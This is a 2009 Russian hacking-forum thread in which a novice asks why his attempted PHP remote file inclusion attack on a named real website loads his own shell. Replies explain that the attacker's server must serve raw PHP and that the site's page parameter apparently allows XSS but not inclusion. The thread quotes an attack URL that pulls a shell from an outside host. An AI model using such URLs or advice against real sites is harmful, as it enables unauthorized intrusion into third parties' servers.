Пхп инклюд для начинающих

Тема в разделе ".:: Уязвимости", создана пользователем extrimportal, 28 окт 2009.

Статус темы:
Закрыта.
  1. extrimportal

    extrimportal

    Регистр.:
    28 ноя 2008
    Сообщения:
    540
    Симпатии:
    70
    Вот решил поинтересоваться темкой. Наткнулся на траблу. Читал статью, источник тут
    Там сказано так:
    Нашол сайт и подставлял http://www.prodisney.ru/index.php?page=http://*****/tp.php
    В результате загрузился шелл в их сайте. Дальше торможу. Зачем мне смотреть шелл если оно грузит мой шелл и там все мое доступа к их чему то нет. И вопрос, это я так торможу и что то неправильно понял или так и должно быть??? :thenks::thenks:
    П.С. просьба сильно не пинать, ток учусь....
     
  2. ZCFD

    ZCFD

    Регистр.:
    16 янв 2008
    Сообщения:
    989
    Симпатии:
    437
    первая мцысль -- не то подставлял )))
    В таких случаях нужно что бы твой сервер отдавал php код ( часто новички указывают урл своего шелла, который исполняясь на сервере отдает уже готовый html )

    проверил

    то что у них в урле используется ?page= ниочем не говорит ))) это просто повод присмотреться

    в данном случае значение $_GET['page'] передается не функции include()(require() ) а чему то вроде file_get_contents() ( или join() или еще чему-нибудь)
    т.е. код из указанного файла не выполняется, а просто выводится пользователю

    Добавлено через 47 секунд
    инклюд тут не прокатит , а вот xss - запросто
     
    extrimportal нравится это.
  3. tostrss

    tostrss

    Регистр.:
    16 окт 2007
    Сообщения:
    771
    Симпатии:
    217
    Здесь не инклуд, в этом параметре задается фрейм.
     
Статус темы:
Закрыта.